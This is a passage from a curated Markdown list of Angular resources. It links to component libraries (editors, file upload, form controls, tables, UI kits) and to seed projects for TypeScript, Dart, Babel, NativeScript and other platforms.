* [@ctrl/ngx-codemirror](https://github.com/TypeCtrl/ngx-codemirror) - Codemirror Wrapper for Angular
* [@instechnologies/ng-rooster](https://github.com/insurance-technologies/ng-rooster) - Angular wrapper of roosterjs, a rich text editor
* [angular2-froala-wysiwyg](https://github.com/froala/angular-froala-wysiwyg) Angular 2 wrapper for Froala WYSIWYG HTML Editor
* [ng2-ace](https://github.com/seiyria/ng2-ace) Ace editor directive made for Angular 2
* [ng2-quill-editor](https://github.com/surmon-china/ngx-quill-editor) - Quill editor component for Angular2
#### File Upload
* [@ctrl/ngx-droppable](https://github.com/typectrl/ngx-droppable) - Give file dropping ability to any element or component
* [file-droppa](https://github.com/chenyukunJoshHub/fileDroppa) Simple files drop and upload component with files list
* [ng2-file-upload](https://github.com/valor-software/ng2-file-upload) Easy to use file upload directives
* [ngx-awesome-uploader](https://www.npmjs.com/package/ngx-awesome-uploader) Angular Library for uploading files. It supports: File Upload and Preview (additionally preview images with lightbox), validation, image cropper , drag and drop with multi language support.
* [ngx-dropzone](https://github.com/peterfreeman/ngx-dropzone) - Highly customizable component to handle file drops and selection.
* [ngx-flow](https://github.com/flowjs/ngx-flow) - Angular7+ wrapper for [flow.js](https://github.com/flowjs/flow.js) for file upload
#### Form Controls
* [@ctrl/ngx-emoji-mart](https://github.com/TypeCtrl/ngx-emoji-mart) - Customizable Slack-like emoji picker for Angular
* [angular-imask](https://github.com/uNmAnNeR/imaskjs/tree/master/packages/angular-imask) Angular 4+ input mask
* [angular2-multiselect-dropdown](https://github.com/CuppaLabs/angular2-multiselect-dropdown) Angular 2 multiselect dropdown component for web applications
* [angular2-text-mask](https://github.com/text-mask/text-mask) Angular 2 input mask directive
* [ng-fveh](https://github.com/guilhermewaess/ng-fveh) - Form Validations Errors Helper - Some helpers to help you with form validation :)
* [ng-select](https://github.com/ng-select/ng-select) Angular ng-select - All in One UI Select, Multiselect and Autocomplete
* [ng2-dropdown](https://github.com/pleerock/ngx-dropdown) Dropdown menu for angular2 and bootstrap 3
* [ng2-radio-group](https://github.com/pleerock/ngx-select-controls) Angular2 directives for radio and checkbox inputs and radio input groups
* [ng2-select](https://github.com/valor-software/ng2-select) Angular2 based replacement for select boxes
* [ngx-color](https://github.com/scttcper/ngx-color) - 🎨 Color Pickers from Sketch, Photoshop, Chrome, Github, Twitter & more
* [ngx-credit-cards](https://www.npmjs.com/package/ngx-credit-cards) - A Credit Card Directives and Form Validators package for Angular X (4+).
* [ngx-flag-picker](https://github.com/iamartyom/ngx-flag-picker) - 😻 Customizable Angular component which containing a dropdown with country flags
* [ngx-flexible-select](https://github.com/andreysyagrovskiy/ngx-flexible-select) - The most flexible and customized select
* [ngx-recursive-form](https://github.com/hsbalar/ngx-recursive-form) - Angular recursive form at any level based on your json input.
#### Icons
* [angular2-fontawesome](https://github.com/travelist/angular2-fontawesome) Angular2 Components and Directives for Fontawesome
* [ng2-fontawesome](https://github.com/seiyria/ng2-fontawesome) A small directive making font awesome even easier to use.
* [ngx-icon-blur](https://github.com/wadie/ngx-icon-blur) An Angular component that can be used to create frosted glass effect of icons.
#### Keyboard Mouse
* [@ctrl/ngx-rightclick](https://github.com/TypeCtrl/ngx-rightclick) - Context Menu Service for Angular
* [angular-clickable-click](https://github.com/DanielKucal/angular-clickable-click) - Sets pointer cursor on elements using standard `(click)` output and allows to disable such events
* [angular-esc](https://github.com/DanielKucal/angular-esc) - Adds `(esc)` output fired by the Escape key
* [ngx-konami](https://github.com/lauthieb/ngx-konami) - Simple directive to add easter eggs in Angular 2+ applications
* [ngx-focus-control](https://github.com/Raiper34/ngx-focus-control) - Library to provide tools to work with focus and focusable elements to improve user interfaces and accessibility
#### Layout Components
* [angular-fullpage](https://github.com/alvarotrigo/angular-fullpage) Official component for fullPage.js, a fullscreen scrolling library.
* [angular-split](https://github.com/bertrandg/angular-split) Angular split component
* [angular2-infinite-scroll](https://www.npmjs.com/package/angular2-infinite-scroll) - An Infinite Scroll Directive for Angular2 (based on Observables)
* [egjs-infinitegrid](https://github.com/naver/egjs-infinitegrid/tree/master/packages/ngx-infinitegrid) - Arrange infinite card elements according to various layout types like masonry for Angular.
* [ng2-card](https://github.com/c-bata/ng2-card) - Card view component for Angular2
* [ng2-fullpage](https://github.com/meiblorn/ngx-fullpage) Fullpage scrolling for Angular2 based on fullPage.js
* [ng2-sheet](https://github.com/lexikteam/ng2-sheet) Angular2 Components to add yours components inside a sheet window and repeatedly
* [ng2-swipeable-card](https://github.com/JayKan/ng2-swipeable-card) - Swipeable card component for Angular2
* [ngx-scrolltop](https://github.com/bartholomej/ngx-scrolltop) - Lightweight, Material Design inspired **button for scroll-to-top** of the page. 🔼 _No dependencies. Pure Angular!_ (Compatibility: Angular 9, Ivy, Universal, `ng add`)
* [od-virtualscroll](https://github.com/dinony/od-virtualscroll) Observable-based virtual scroll implementation in Angular
#### Loaders
* [@kken94/ngx-progress](https://github.com/kKen94/ngx-progress) The most powerful and customizable progress bar for Angular ✨
* [angular-epic-spinners](https://github.com/hackafro/angular-epic-spinners) Reusable spinner components for angular
* [angular2-busy](https://github.com/devyumao/angular2-busy) Show busy/loading indicators on any promise, or on any Observable's subscription
* [angular2-promise-buttons](https://github.com/johannesjo/angular2-promise-buttons) - Loading buttons for Angular 2 by @johannesjo
* [isLoading? service](https://gitlab.com/service-work/is-loading) - A simple and flexible loading indicator service for Angular apps.
* [ng-spinners](https://github.com/JoshK2/ng-spinners) - Amazing collection of pure CSS angular spinners components.
* [ng2-progress-bar](https://github.com/pleerock/ngx-progress-bar) Simple progress bar for angular2 and bootstrap 3
* [ngx-config](https://github.com/fulls1z3/ngx-config) - Configuration utility for Angular (incl. Angular Universal loader) by @fulls1z3
* [ngx-img-fallback](https://github.com/VadimDez/ngx-img-fallback) Load placeholder image on image error
* [ngx-progressbar](https://github.com/MurhafSousli/ngx-progressbar) - Nanoscopic progress bar, featuring realistic trickle animations.
#### Maps
* [angular-cesium](https://github.com/TGFTech/angular-cesium) Creating map based web apps using Cesium and Angular
* [angular2-google-maps](https://github.com/SebastianM/angular-google-maps) Angular2 directives for Google Maps
* [ngx-mapbox-gl](https://github.com/Wykks/ngx-mapbox-gl) - Angular binding of mapbox-gl-js
#### Notifications
* [ng-snotify](https://github.com/artemsky/ng-snotify/) - Angular 4 Notification Center
* [ng2-sweetalert2](https://github.com/seiyria/ng2-sweetalert2) A wrapper for sweetalert2 for use with Angular 2.
* [ngx-popper](https://github.com/MrFrankel/ngx-popper) - Tooltip managment, wrapper for popper.js(https://popper.js.org/)
* [ngx-toastr](https://github.com/scttcper/ngx-toastr) - Notifications/Toastr
#### State Management
* [angular2-query-builder](https://github.com/zebzhao/Angular-QueryBuilder) Modernized query builder based on jquery QueryBuilder
* [angular2-jwt](https://github.com/auth0/angular2-jwt) Library for sending authenticated HTTP requests and decoding JWTs
* [angular2-cookie](https://github.com/salemdar/angular2-cookie) Library that implements Angular 1.x $cookies service in Angular 2
* [angular-safeguard](https://github.com/MikaAK/angular-safeguard) Wrapper around cookies/sessionStorage/localStorage for angular2. If all are unavailable will use an in memory storage.
* [ng2-storage](https://github.com/seiyria/ng2-storage) A localStorage and sessionStorage wrapper written using ES6 Proxies for Angular 2
* [ngx-store](https://github.com/zoomsphere/ngx-store) - Complex library for managing `localStorage`, `sessionStorage` and cookies, allows to watch data changes, provides decorators and API based on builder pattern
* [ngx-liquid-cache](https://github.com/luckyseven/ngx-liquid-cache) - A powerful, automatic and optimized Angular 2 cache system that fits everywhere!
* [ng-http-cache](https://github.com/davguij/angular-http-cache) - Speed up your remote requests by automatically caching them on client.
* [ngx-cache](https://github.com/fulls1z3/ngx-cache) - Cache utility for Angular (incl. browser & server platform implementations) by @fulls1z3
* [universal-model-angular](https://github.com/universal-model/universal-model-angular) - Store and state management for Angular
* [ng-http-caching](https://github.com/nigrosimone/ng-http-caching) - Cache for HTTP requests in Angular application.
* [ng-simple-state](https://github.com/nigrosimone/ng-simple-state) - Simple state management in Angular with only Services and RxJS.
#### Tables
* [ag-grid](https://www.ag-grid.com/) Advanced Datagrid for Pure Javascript / AngularJS 1.x / AngularJS 2 / Web Components
* [ng2-handsontable](https://github.com/valor-software/ng2-handsontable) Excel-like data grid / spreadsheet
* [ng2-smart-table](https://github.com/akveo/ng2-smart-table) Smart data table library with sorting, filtering, pagination & add/edit/delete functions.
* [ng2-table](https://github.com/valor-software/ng2-table) Simple table extension with sorting, filtering, paging... for Angular2 apps
* [ngfb-sortable-table](https://github.com/NodeArt/Angular-Firebase-Sortable-Table) - Angular Firebase Sortable Table. Ability to filter and sort data with own firebase quering tools.
* [ngx-datatable](https://github.com/swimlane/ngx-datatable) A feature-rich yet lightweight data-table crafted for Angular2 and beyond!
* [ignite-ui-angular's grid](https://www.infragistics.com/products/ignite-ui-angular/angular/components/grid/grid) - The data grid, tree grid, hierarchical grid in [Ignite UI for Angular](https://github.com/IgniteUI/igniteui-angular) provide excel-style filtering, live-data, sorting, draggable row and other toolbar.
#### UI Libraries
##### General
* [@ngx-kit/sula](https://github.com/ngx-kit/sula) - Set of themed components for Angular.
* [Axponents: of Accessible Web Components (Dylan Barrell)](https://github.com/dylanb/Axponents/tree/master/angular2)
* [Element Angular](https://github.com/ElemeFE/element-angular) - Element Design components built on top of Angular 2
* [Essential JS 2 for Angular by Syncfusion](https://www.syncfusion.com/angular-ui-components) - Over 60 high-performance, lightweight, modular, and responsive UI components for Angular.
* [Nebular](https://github.com/akveo/nebular) - set of essential (Theme, UI Kit, Auth, Security) modules for complex Angular applications
* [NG ZORRO MOBILE](https://github.com/NG-ZORRO/ng-zorro-antd-mobile) - An enterprise-class mobile UI components based on Ant Design Mobile and Angular.
* [NG ZORRO](https://github.com/NG-ZORRO/ng-zorro-antd) - An enterprise-class UI components based on Ant Design and Angular.
* [ng-lightning](https://github.com/ng-lightning/ng-lightning) Native Angular 2 components & directives for Lightning Design System
* [ng-metro4](https://github.com/morrisjdev/ng-metro4) - Angular implementation of UI framework Metro4
* [ng-sq-ui](https://github.com/SQ-UI/ng-sq-ui) - Simple Quality UI kit for Angular. Build by developers for developers! [![contributions welcome](https://img.shields.io/badge/issues-welcome-brightgreen.svg?style=flat)](https://github.com/SQ-UI/ng-sq-ui/issues) [![Maintainability](https://api.codeclimate.com/v1/badges/d53c1670c301071be452/maintainability)](https://codeclimate.com/github/SQ-UI/ng-sq-ui/maintainability)
* [ngSemantic](https://github.com/vladotesanovic/ngSemantic) - UI components based on Semantic UI
* [ngx-qrcode2](https://github.com/techiediaries/ngx-qrcode) - An Angular 4+ Component library for Generating QR (Quick Response ) Codes
* [ngx-ui](https://github.com/swimlane/ngx-ui) - Style and Component Library for Angular2 and beyond!
* [prime-ng](https://www.primefaces.org/primeng/) Collection of rich UI components for Angular 2
* [vmware clarity](https://github.com/vmware/clarity) - Mostly a CSS only framework but some components are ported to Angular 2
* [Wijmo 5](http://wijmo.com/products/wijmo-5/) - Set of UI components for Angular2
* [NgLazyLoadComponent](https://www.npmjs.com/package/ng-lazy-load-component) . Lazy load Angular component into HTML template without routing.
##### Material Based
* [@angular-material-extensions/contacts](https://github.com/angular-material-extensions/contacts) - Angular Library to manage contacts and users with a material design
* [@angular-material-extensions/faq](https://github.com/angular-material-extensions/faq) - Angular Library built with material design in order to provide a reusable faq (frequently asked questions) component for every project. Ask, Answer and List
* [@angular-material-extensions/google-maps-autocomplete](https://github.com/angular-material-extensions/google-maps-autocomplete) - **Autocomplete** input component and directive for google-maps built with angular material design
* [@angular-material-extensions/link-preview](https://github.com/angular-material-extensions/link-preview) - Angular open source UI library to preview web links
* [@angular-material-extensions/pages](https://github.com/angular-material-extensions/pages) - Open source library for angular apps to illustrate custom material pages content with steps (ideal for **tutorials** and **explanations** purposes)
* [@angular-material-extensions/password-strength](https://github.com/angular-material-extensions/password-strength) - Angular UI library to illustrate and validate a **password**'s strength with material design
* [angular-jqwidgets](https://www.jqwidgets.com/angular/) Advanced Angular Components with Material Design.
* [Covalent](https://teradata.github.io/covalent/) - a UI platform built on Angular 2.0 + Material Design
* [Material 2](https://github.com/angular/material2) - Angular team's Material Design components built on top of Angular 2
* [Teradata covalent](https://github.com/Teradata/covalent/) - UI Platform built on @angular/material 2.0
##### Bootstrap Based
* [@firebaseui/ng-bootstrap](https://github.com/firebaseui/ng-bootstrap) - Angular Bootstrap UI library for `firebase` `authentication` powered by @ng-bootstrap
* [angular-bootstrap-md](https://mdbootstrap.com/docs/angular/) Material Design for Bootstrap 4 (Angular)
* [fuel-ui](https://github.com/FuelInteractive/fuel-ui) Bootstrap 4 components and directives for use in Angular 2
* [ng-bootstrap](https://ng-bootstrap.github.io) - Angular 4 directives for Bootstrap 4 by the ui-bootstrap team
* [ng2-bootstrap](https://github.com/valor-software/ngx-bootstrap) Native Angular2 Bootstrap 3&4 components
* [ng2-bs](https://github.com/pkozlowski-opensource/ng2-bs) Experiments with Angular 2 directives for Bootstrap.
* [ng2-modal](https://github.com/pleerock/ngx-modal) Modal window for angular2 and bootstrap 3
* [ng2-paginator](https://github.com/pleerock/ngx-paginator) Pagination control for angular2 and bootstrap 3
* [ng2-tabs](https://github.com/pleerock/ngx-tabs) Tabs control for angular2 and bootstrap 3
#### UX Components
* [angular-shepherd](https://github.com/shipshapecode/angular-shepherd) - Angular 7 Service wrapping the site tour library [Shepherd](https://github.com/shipshapecode/shepherd)
* [ng2-archwizard](https://github.com/madoar/ng2-archwizard) - Wizard component for Angular 2
* [ngx-app-tour](https://github.com/hamdiwanis/ngx-app-tour) - Angular2+ plugin for building a tour, showcase or a walkthrough for your app
#### Viewers
* [egjs-flicking](https://github.com/naver/egjs-flicking/tree/master/packages/ngx-flicking) - It's reliable, flexible and extendable carousel for Angular.
* [ng2-pdf-viewer](https://github.com/VadimDez/ng2-pdf-viewer) PDF viewer component
* [ng2-safe-img](https://github.com/hyzhak/ng2-safe-img) Very tiny and safe img for Angular 2
* [ngu-carousel](https://github.com/sheikalthaf/ngu-carousel) - Angular Universal carousel.
* [ngx-siema](https://github.com/lexzhukov/ngx-siema) - Lightweight and simple carousel with no dependencies.
#### Misc Components
* [@ngx-context](https://github.com/ng-turkey/ngx-context) - Angular Context: Easy property binding for router outlet and nested component trees..
* [Angular SizeObserver](https://gitlab.com/service-work/size-observer) - style DOM elements based on their display size (rather than browser screen size).
* [angular2-simple-countdown](https://github.com/previousdeveloper/angular2-simple-countdown) - a simple countdown angular2 directive with multiple language
* [ng-chat](https://github.com/rpaschoal/ng-chat) - A simple facebook/linkedin lookalike chat module for Angular applications
* [ng-google-sheets-db](https://github.com/FranzDiebold/ng-google-sheets-db-library) :rocket: Use Google Sheets as your (read-only) backend!
* [ng-katex](https://github.com/garciparedes/ng-katex) Angular module to write beautiful math expressions with TeX syntax boosted by KaTeX library
* [ng-wormhole](https://github.com/topaxi/ng-wormhole) - Render components somewhere else in the DOM
* [ng2-adsense](https://github.com/scttcper/ng2-adsense) - Easy AdSense for Angular Applications
* [ngx-avatar](https://github.com/HaithemMosbahi/ngx-avatar) - Avatar component that makes it possible to genearte / fetch avatar based on the information you have about the user.
* [ngx-cdmon](https://www.npmjs.com/package/ngx-cdmon) - Library for monitoring Angular change detection performance.
* [ngx-countdown](https://github.com/cipchk/ngx-countdown) - Simple, easy and performance countdown for angular
* [@ngneat/transloco](https://github.com/ngneat/transloco) - 🚀 😍 The internationalization (i18n) library for Angular
* [ngx-i18n-router](https://github.com/fulls1z3/ngx-i18n-router) - Route internationalization utility for Angular by @fulls1z3
* [ngx-linkifyjs](https://github.com/AnthonyNahas/ngx-linkifyjs) - Angular V6 wrapper for linkifyjs - library for finding links in plain text and converting them to HTML <a> tags via linkifyjs
* [ngx-meta](https://github.com/fulls1z3/ngx-meta) - Dynamic page title & meta tags utility for Angular (w/server-side rendering) by @fulls1z3
* [ngx-wheel](https://github.com/Sayegh7/ngx-wheel) - Angular prize winning wheel component!
* [@tolgee/ngx](https://github.com/tolgee/tolgee-js/tree/main/packages/ngx/projects/ngx-tolgee) - Web-based localization tool enabling users to translate directly in the Angular app they develop.
* [xng-breadcrumb](https://github.com/udayvunnam/xng-breadcrumb) - Zero config breadcrumb solutuon. A lightweight, configurable and reactive breadcrumbs for Angular 6 and beyond.
* [ng-let](https://github.com/nigrosimone/ng-let) - Structural directive for sharing data as local variable into html component template.
* [ng-for-track-by-property](https://github.com/nigrosimone/ng-for-track-by-property) - Angular global trackBy property directive with strict type checking.
### JAM Stack
* [scully](https://github.com/scullyio/scully) - Scully is a static site generator for Angular projects looking to embrace the Jamstack.
### Universal Angular 2
> Universal (isomorphic) javascript support for Angular 2
#### Universal Courses And Tutorials
* [Guide to Angular Universal - a comprehensive guide how to sharpen your Universal Skills](https://www.newline.co/courses/newline-guide-to-angular-universal)
#### Universal General Resources
* [Universal Angular 2 Repository (GitHub)](https://github.com/angular/universal)
#### Universal Seed Projects
* [universal-starter](https://github.com/angular/universal-starter) - Angular 2 Universal starter kit by @Angular-Class
* [ng-seed/universal](https://github.com/ng-seed/universal) - Seed project for Angular Universal apps featuring Server-Side Rendering (SSR), Webpack, dev/prod modes, DLLs, AoT compilation, HMR, SCSS compilation, lazy loading, config, cache, i18n, SEO, and TSLint/codelyzer by @fulls1z3
* [angular-universal](https://github.com/enten/angular-universal) - Fast, Unopinionated, Minimalist starter kit for Angular Universal 100% powered by Angular CLI
* [angular-universal-heroku-starter](https://github.com/Alex61NN5/angular-universal-heroku-starter) - Angular 7 Universal Starter Kit with Server-Side Rendering (SSR) and easy deployment to Heroku
---
### Angular 2 in TypeScript
> TypeScript lets you write JavaScript the way you really want to.
> TypeScript is a typed superset of JavaScript that compiles to plain JavaScript.
#### TypeScript General Resources
* [TypeScript](https://www.typescriptlang.org/) Official Website for TypeScript
* [REPL](https://www.typescriptlang.org/play/) Official TypeScript REPL that runs entirely in your browser
* [TypeScript Repository (GitHub)](https://github.com/Microsoft/TypeScript) Official GitHub Repo for TypeScript
* [DefinitelyTyped Repository (GitHub)](https://github.com/DefinitelyTyped/DefinitelyTyped) The repository for high quality TypeScript type definitions.
#### TypeScript Seed Projects
* [Angular Seed](https://mgechev.github.io/angular-seed/) Seed project for Angular apps
* [ng2-play](https://github.com/pkozlowski-opensource/ng2-play) A minimal Angular2 playground using TypeScript and SystemJS loader
* [Angular Lab](https://github.com/rolandjitsu/angular-lab) A simple Angular 2+ setup using [Angular CLI](https://cli.angular.io), [TypeScript](https://www.typescriptlang.org), [Angular Flex Layout](https://github.com/angular/flex-layout), [Material 2](https://material.angular.io), [AOT](https://angular.io/docs/ts/latest/cookbook/aot-compiler.html), and unit and e2e tests on [Travis CI](https://travis-ci.org) and [Saucelabs](https://saucelabs.com).
* [Angular 2 Samples](https://github.com/thelgevold/angular-2-samples) Angular 2.0 sample components
* [Todo app with Firebase, OAuth, and Immutable](https://github.com/r-park/todo-angular-firebase)
* [Spring Boot and Angular2 tutorial](https://github.com/springboot-angular2-tutorial/angular2-app) Angular2 practical example based on [Rails tutorial](https://www.railstutorial.org/).
* [Angular 2 Goldilocks seed](https://github.com/ColinEberhardt/angular2-goldilocks-seed) - A seed project for Angular 2 and TypeScript that is not too simple, yet not too complex. In fact it's just right!
* [Angular 2 Starter](https://github.com/antonybudianto/angular-starter) - Simple Angular 2 Starter with Gulp workflow and Travis CI
* [Angular 2 Leaflet Starter](https://github.com/haoliangyu/ngx-leaflet-starter) - A map application starter based on Angular 2 and Leaflet
* [Angular 2 MapboxGL Starter](https://github.com/haoliangyu/ngx-mapboxgl-starter) - Another map application starter based on Angular 2 and MapboxGL JS
* [Angular 2 reconnecting websockets quickstart](https://github.com/mkusz/ng2_websockets_quickstart) - Simple counter using 2-way or 1-way reconnecting websockets communication
* [ng2-start](https://github.com/cebor/ng2-start) - Minimal setup to start creating an angular2 application
* [ng-kitchen-sink](https://github.com/born2net/Angular-kitchen-sink) - The ultimate Angular 2 bootstrap single page app - touches on all key and advanced aspects of Angular
* [ng-skeleton](https://github.com/born2net/ng-skeleton) - The ultimate Angular seed with ngrx, bootstrap and two factor auth
* [angular2-demo](https://github.com/amcdnl/angular2-demo) Minimal Angular2 Demo using TypeScript / Sass / Npm Tasks
* [Angular 2 Dashboard Starter](https://github.com/hasanhameed07/angular2-dashboard-starter) - Ready to use dashboard control panel seed project based on Angular 2 and AdminLTE bootstrap theme.
* [ngx-admin](https://github.com/akveo/ngx-admin) - Admin template based on Nebular framework (Angular 4+, Bootstrap 4+)
* [Angular 2 full code coverage](https://github.com/danday74/angular2-coverage) - Solid tested SystemJS and gulp workflow ready for your code using Angular2 final release (2.1.0) .. Demonstrates unit
and full code coverage
* [Angular 2 webpack](https://github.com/michaelbazos/angular2-starter) - Tour of Heroes official typescript tutorial built with webpack
* [ng2-boiler](https://github.com/amcdnl/ng2-boiler) - A bare-bones simple starter with Angular2, TypeScript and Webpack configured.
* [Angular Webpack Starter](https://github.com/antonybudianto/angular-webpack-starter) - Angular Webpack Starter with AoT compilation, Lazy-loading, and Tree-shaking
* [Reaper](https://github.com/Xamber/Reaper) - Angular 2 Webpack Starter Boilerplate w/o 2269 dependencies
* [famn](https://github.com/implustech/famn) - Angular 2 + FeathersJS application framework for both client and server side
* [Angular NPM Module Seed](https://github.com/davguij/angular-npm-module-seed) - Starting point for developing Angular modules and publishing them on NPM.
* [Angular2 D3v4 Seed](https://github.com/gp187/angular2-d3v4-graph) - Angular2 D3v4 implementation of charts, graphs, area and view porting seed project
* [ng-seed/spa](https://github.com/ng-seed/spa) - Seed project for Angular apps featuring Webpack, dev/prod modes, DLLs, AoT compilation, HMR, SCSS compilation, lazy loading, config, cache, i18n, SEO, and TSLint/codelyzer by @fulls1z3
* [Reboard](https://github.com/ksiabani/reboard) - Angular 4 + Material 2 starter dashboard with ngx-charts, based on generator-ngx-rocket (Typescript, SASS, Webpack, Jasmine+Karma, Protractor, TSLint, Codelyzer, Stylelint, ngx-translate, Lodash, Angular Flex-Layout)
* [Angular5 + Redux + Graphql + MySQL quickstart](https://github.com/rafaesc/fullstack-graphql-angular) - Simple Fullstack GraphQL Application with Angular CLI + Redux + Express + GraphQL + Sequelize (supports MySQL, Postgres, Sqlite and MSSQL).
* [Angular5 + Firebase + Structure](https://github.com/naologic/angular5-starter) - Angular 5 + Firebase + a very good router/module structure to make it your own so easy
* [angular-app-example](https://github.com/daixianceng/angular-app-example) - Angular latest + material + sass themes + more beautiful features, a dashboard app example
* [NG-MATERO](https://github.com/ng-matero/ng-matero) - This Ng-Matero is an Angular admin templete made with Material componnets.
* [TinkoffCreditSystems/angular-open-source-starter](https://github.com/TinkoffCreditSystems/angular-open-source-starter) - a starter project for creating open-source libraries for Angular
* [truonghungit/angular-starter](https://github.com/truonghungit/angular-starter) - 😍 A complete Angular 10, NgRx, Angular CLI & Angular Material starter project
* [Eoapi](https://github.com/eolinker/eoapi) - A lightweight, extensible API tool based on Angular and Electron
* [**{{** add_your_repo **}}**](https://github.com/gdi2290/awesome-angular/edit/gh-pages/README.md)
---
#### Ionic 2 in Angular 2
> Ionic is the beautiful, open source front-end SDK for developing hybrid mobile apps with web technologies.
* [Ionic Framework](https://ionicframework.com) Official Website for Ionic Framework
* [Ionic Documentation](https://ionicframework.com/docs/) Official for Ionic Framework
##### Ionic 2 General Resources
* [Ionic 2 Repository (GitHub)](https://github.com//ionic-team/ionic)
* [Ionic 2 Awesome](https://github.com/candelibas/awesome-ionic)
---
#### Angular 2 in Cordova
Apache Cordova is a popular mobile application development framework using CSS3, HTML5, and JavaScript instead of relying on platform-specific APIs.
* [Cordova Framework](https://cordova.apache.org/) Official Website for Apache Cordova
* [Cordova Documentation](https://cordova.apache.org/docs/en/latest/) Official Documentation for Apache Cordova
##### Cordova Seed Projects
* [Angular 2 Seed CLI Admin (Template)](https://github.com/jvitor83/angular-pwa-seed) Multi-platform Angular 2 project (Web/PWA, Mobile and Desktop) with Ionic 2 (and optionally Bootstrap).
---
### Angular 2 in Dart
> Dart is an open-source, scalable programming language, with robust libraries and runtimes, for building web, server, and mobile apps.
#### Dart General Resources
* [Dart](https://www.dartlang.org/) Official Website for Dart
* [Dartpad](https://dartpad.dartlang.org/) Dartpad lets play with Dart on-line, in a zero-install, zero configuration environment.
* [Dart Organization (GitHub)](https://github.com/dart-lang) Official GitHub Organization for Dart
* [Pub](https://pub.dartlang.org/) Repository of packages of software for the Dart programming language.
* [Dartisans](https://plus.google.com/communities/114566943291919232850) The Official Dart Google+ community
* [Dart Slack Channel](https://dartlang-slack.herokuapp.com/) The Official Dart Slack channel.
#### Dart Seed Projects
* [Angular 2 Dart Quickstart](https://github.com/andresaraujo/ng2_dart_quickstart) A minimal quick start project.
#### Dart Demo, Samples, and Examples
* [Hackernews App](https://github.com/andresaraujo/ng2_hackernews) A HackerNews application made with Angular 2 for Dart
* [Router Demo](https://github.com/andresaraujo/ng2_dart_router_demo) A basic example of Angular 2 router.
* [**{{** add_your_repo **}}**](https://github.com/PatrickJS/awesome-angular/edit/gh-pages/README.md)
---
### Angular 2 in Traceur
> Traceur is a JavaScript.next-to-JavaScript-of-today compiler
#### Traceur General Resources
* [Traceur Repository (GitHub)](https://github.com/google/traceur-compiler) Official GitHub Repo for Traceur
#### Traceur Seed Projects
* [GitHub: Angular2 ES6 Seed (Evan Plaice)](https://github.com/evanplaice/angular2-es6-seed/)
* [**{{** add_your_repo **}}**](https://github.com/PatrickJS/awesome-angular/edit/gh-pages/README.md)
---
### Angular 2 in Babel
> The compiler for writing next generation JavaScript.
#### Babel General Resources
* [Babel](https://babeljs.io/) Official Website for Babel
* [REPL](https://babeljs.io/repl/) Official Babel REPL that runs entirely in your browser
* [Babel Repository (GitHub)](https://github.com/babel/babel) Official GitHub Repo for Babel
#### Babel Angular 2 Online Playground
* [Plunker: Angular 2 + Babel](https://plnkr.co/edit/PxCzCu?p=preview)
#### Babel Seed Projects
* [babel-angular2-app](https://github.com/shuhei/babel-angular2-app) A skeleton Angular 2 app built with [Babel](https://babeljs.io/) and [Browserify](http://browserify.org/).
* [angular2-fullstack-starter](https://github.com/jgodi/angular2-fullstack-starter) A full stack skeleton Angular 2 app built with Webpack/Babel.
* [angular2-es6-starter](https://github.com/blacksonic/angular2-babel-esnext-starter) A skeleton Angular 2 ES6 application built with Babel, Webpack, Gulp.
* [angular-babel-seed](https://github.com/rbnlffl/angular-babel-seed) The super simple Angular quickstarter with ES6
* [**{{** add_your_repo **}}**](https://github.com/PatrickJS/awesome-angular/edit/gh-pages/README.md)
#### Babel Demo, Samples, and Examples
* [angular2-es6-todomvc](https://github.com/blacksonic/angular2-esnext-todomvc) Angular 2 TodoMVC implementation with ES6.
* [ng1-ng2-webpack-lazy-uirouter](https://github.com/swimlane/ng1-ng4-webpack-lazy-uirouter) Hybrid lazy-loading Angular1 + Angular2 using UI-Router, Webpack2 and Babel.
* [**{{** add_your_repo **}}**](https://github.com/PatrickJS/awesome-angular/edit/gh-pages/README.md)
#### Babel Plugins
* [babel-preset-angular2](https://github.com/shuhei/babel-preset-angular2) Babel presets for Angular2
* [babel-plugin-type-assertion](https://github.com/shuhei/babel-plugin-type-assertion) An experimental babel transformer plugin for rtts_assert
---
### Angular 2 in ES5
> An ECMAScript language that includes structured, dynamic, functional, and prototype-based features.
##### ES5 General Resources
* [**{{** help_add_resources **}}**](https://github.com/PatrickJS/awesome-angular/edit/gh-pages/README.md)
#### ES5 Seed Projects
[angular2-es5-starter-kit](https://github.com/islam-muhammad/angular2-es5) Angular2 ES5 Starter Kit
---
#### Meteor in Angular 2
> Build Realtime Web and Mobile Apps With Angular and Meteor
##### Meteor General Resources
* [Angular Meteor](https://angular-meteor.com/) Official Website for Angular Meteor
* [Angular 2 Meteor](https://www.angular-meteor.com/angular2)
#### Meteor Seed Projects
* [Angular2 Meteor Seed](https://github.com/KyneSilverhide/angular2-meteor-seed)
* [**{{** add_your_repo **}}**](https://github.com/PatrickJS/awesome-angular/edit/gh-pages/README.md)
---
#### Angular 2 in NativeScript
> Build truly native iOS, Android and Windows Phone apps with Javascript and CSS. Try NativeScript open-source framework for cross-platform development.
##### NativeScript General Resources
* [NativeScript](https://www.nativescript.org/) Official Website for NativeScript
* [Using NativeScript](https://www.syntaxsuccess.com/viewarticle/using-nativescript-with-angular-2.0)
#### NativeScript Seed Projects
* [sample-Angular2](https://github.com/NativeScript/sample-Angular2)
* [angular2-seed-advanced](https://github.com/NathanWalker/angular-seed-advanced)
* [**{{** add_your_repo **}}**](https://github.com/PatrickJS/awesome-angular/edit/gh-pages/README.md)
---
#### Angular 2 in React Native
> React Native enables you to build world-class application experiences on native platforms using a consistent developer experience based on JavaScript
##### React Native General Resources
* [React Native](https://facebook.github.io/react-native/) Official Website for React Native
#### React Native Projects
* [Angular 2 React Native Renderer (GitHub)](https://github.com/angular/react-native-renderer)
#### React Native Seed Projects
* [**{{** add_your_repo **}}**](https://github.com/PatrickJS/awesome-angular/edit/gh-pages/README.md)
---
### Angular 2 in Haxe
> Haxe is an open source toolkit based on a modern, high level, strictly typed programming language, a cross-compiler, a complete cross-platform standard library and ways to access each platform's native capabilities. General purpose language, with Haxe, you can easily build cross-platform tools targeting all the mainstream platforms natively. "Write once compile anywhere", with strong easily extendable macro system and powerfull, highly optimizing compiler with DCE (and f.e. using inline constructors). Can be used for server side rendering and in isomorphic way - possible to share the same source code compiling into client side in javascript and server side in pyhton (or java/php/node - can be choosen later/changed at scaling). Haxe code can contain (inline) any target language fragments (can be used to step by step porting), the externs mechanism provides access to the native APIs and libraries in a type-safe manner.
